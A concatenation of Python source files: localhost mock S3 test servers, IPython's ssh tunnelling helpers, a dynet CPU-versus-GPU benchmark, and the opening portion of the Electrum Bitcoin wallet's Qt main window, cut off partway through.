self.wfile.write("%s %d %s\r\n" % (self.protocol_version, code, message))
def handle_expect_100(self):
logging.info("Received Expect-100")
self.send_response_only(100)
self.end_headers()
return True
def do_POST(self):
query = urlparse.urlparse(self.path).query
logging.info("MultipartPreservingDataHandler POST ?" + query)
if query == "uploads":
self.send_response(200)
post_data = r"""<?xml version="1.0" encoding="UTF-8"?>
<hi><UploadId>TEST</UploadId></hi>""".encode()
self.send_header("Content-length", str(len(post_data)))
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(post_data)
else:
try:
assert query == "uploadId=TEST"
logging.info("Content-Length = " + self.headers.get("Content-Length"))
post_data = self.rfile.read(int(self.headers.get("Content-Length")))
root = xml.etree.ElementTree.fromstring(post_data)
assert root.tag == "CompleteMultipartUpload"
assert len(root) > 1
content = ""
for i, part in enumerate(root):
assert part.tag == "Part"
assert len(part) == 2
assert part[0].tag == "PartNumber"
assert part[1].tag == "ETag"
assert int(part[0].text) == i + 1
content += self.server.storage["@"+part[1].text]
data.setdefault("multipart_received_data", []).append(content)
data["multipart_parts"] = len(root)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
logging.info("Sending 200")
except:
logging.error("Sending 500")
self.send_response(500)
self.finish()
def do_PUT(self):
uid = uuid.uuid4()
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("ETag", str(uid))
self.end_headers()
query = urlparse.urlparse(self.path).query
path = urlparse.urlparse(self.path).path
logging.info("Content-Length = " + self.headers.get("Content-Length"))
logging.info("PUT " + query)
assert self.headers.get("Content-Length")
assert self.headers["Expect"] == "100-continue"
put_data = self.rfile.read()
data.setdefault("received_data", []).append(put_data)
logging.info("PUT to {}".format(path))
self.server.storage["@"+str(uid)] = put_data
self.finish()
def do_GET(self):
path = urlparse.urlparse(self.path).path
if path in self.server.storage:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", str(len(self.server.storage[path])))
self.end_headers()
self.wfile.write(self.server.storage[path])
else:
self.send_response(404)
self.end_headers()
self.finish()
class RedirectingPreservingDataHandler(BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def parse_request(self):
result = BaseHTTPRequestHandler.parse_request(self)
# Adaptation to Python 3.
if sys.version_info.major == 2 and result == True:
expect = self.headers.get("Expect", "")
if (expect.lower() == "100-continue" and self.protocol_version >= "HTTP/1.1" and self.request_version >= "HTTP/1.1"):
if not self.handle_expect_100():
return False
return result
def send_response_only(self, code, message=None):
if message is None:
if code in self.responses:
message = self.responses[code][0]
else:
message = ""
if self.request_version != "HTTP/0.9":
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, code, message))
def handle_expect_100(self):
logging.info("Received Expect-100")
return True
def do_POST(self):
query = urlparse.urlparse(self.path).query
if query:
query = "?{}".format(query)
self.send_response(307)
self.send_header("Content-type", "text/xml")
self.send_header("Location", "http://{host}:{port}/{bucket}/test.csv{query}".format(host=localhost, port=preserving_data_port, bucket=bucket, query=query))
self.end_headers()
self.wfile.write(r"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>TemporaryRedirect</Code>
<Message>Please re-send this request to the specified temporary endpoint.
Continue to use the original request endpoint for future requests.</Message>
<Endpoint>{host}:{port}</Endpoint>
</Error>""".format(host=localhost, port=preserving_data_port).encode())
self.finish()
def do_PUT(self):
query = urlparse.urlparse(self.path).query
if query:
query = "?{}".format(query)
self.send_response(307)
self.send_header("Content-type", "text/xml")
self.send_header("Location", "http://{host}:{port}/{bucket}/test.csv{query}".format(host=localhost, port=preserving_data_port, bucket=bucket, query=query))
self.end_headers()
self.wfile.write(r"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>TemporaryRedirect</Code>
<Message>Please re-send this request to the specified temporary endpoint.
Continue to use the original request endpoint for future requests.</Message>
<Endpoint>{host}:{port}</Endpoint>
</Error>""".format(host=localhost, port=preserving_data_port).encode())
self.finish()
class CommunicationServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps(data))
self.finish()
def do_PUT(self):
self.send_response(200)
self.end_headers()
logging.info(self.rfile.read())
self.finish()
servers = []
servers.append(HTTPServer((localhost, communication_port), CommunicationServerHandler))
servers.append(HTTPServer((localhost, redirecting_to_http_port), RedirectingToHTTPHandler))
servers.append(HTTPServer((localhost, preserving_data_port), PreservingDataHandler))
servers[-1].storage = {}
servers.append(HTTPServer((localhost, multipart_preserving_data_port), MultipartPreservingDataHandler))
servers[-1].storage = {}
servers.append(HTTPServer((localhost, simple_server_port), SimpleHTTPServerHandler))
servers.append(HTTPServer((localhost, redirecting_preserving_data_port), RedirectingPreservingDataHandler))
jobs = [ threading.Thread(target=server.serve_forever) for server in servers ]
[ job.start() for job in jobs ]
time.sleep(60) # Timeout
logging.info("Shutting down")
[ server.shutdown() for server in servers ]
logging.info("Joining threads")
[ job.join() for job in jobs ]
logging.info("Done")
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
import os,sys, atexit
import signal
import socket
from multiprocessing import Process
from getpass import getpass, getuser
import warnings
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
except ImportError:
paramiko = None
else:
from .forward import forward_tunnel
try:
from IPython.external import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# select_random_ports copied from IPython.parallel.util
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
for i in xrange(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
p.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -f -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print (tunnel.exitstatus)
print (tunnel.before)
print (tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# Don't let SIGINT kill the tunnel subprocess
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print ('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
cpu_vs_gpu.py
|
# Usage: python cpu_vs_gpu.py
import time
from multiprocessing import Process
def do_cpu():
import _dynet as C
C.init()
cm = C.Model()
cpW = cm.add_parameters((1000,1000))
s = time.time()
C.renew_cg()
W = C.parameter(cpW)
W = W*W*W*W*W*W*W
z = C.squared_distance(W,W)
z.value()
z.backward()
print("CPU time:",time.time() - s)
def do_gpu():
import _dynet as G
import sys
sys.argv.append('--dynet-devices')
sys.argv.append('GPU:0')
G.init()
gm = G.Model()
gpW = gm.add_parameters((1000,1000))
s = time.time()
G.renew_cg()
W = G.parameter(gpW)
W = W*W*W*W*W*W*W
z = G.squared_distance(W,W)
z.value()
z.backward()
print("GPU time:",time.time() - s)
if __name__ == '__main__':
procs1 = Process(target=do_cpu)
procs1.start()
procs2 = Process(target=do_gpu)
procs2.start()
procs1.join()
procs2.join()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
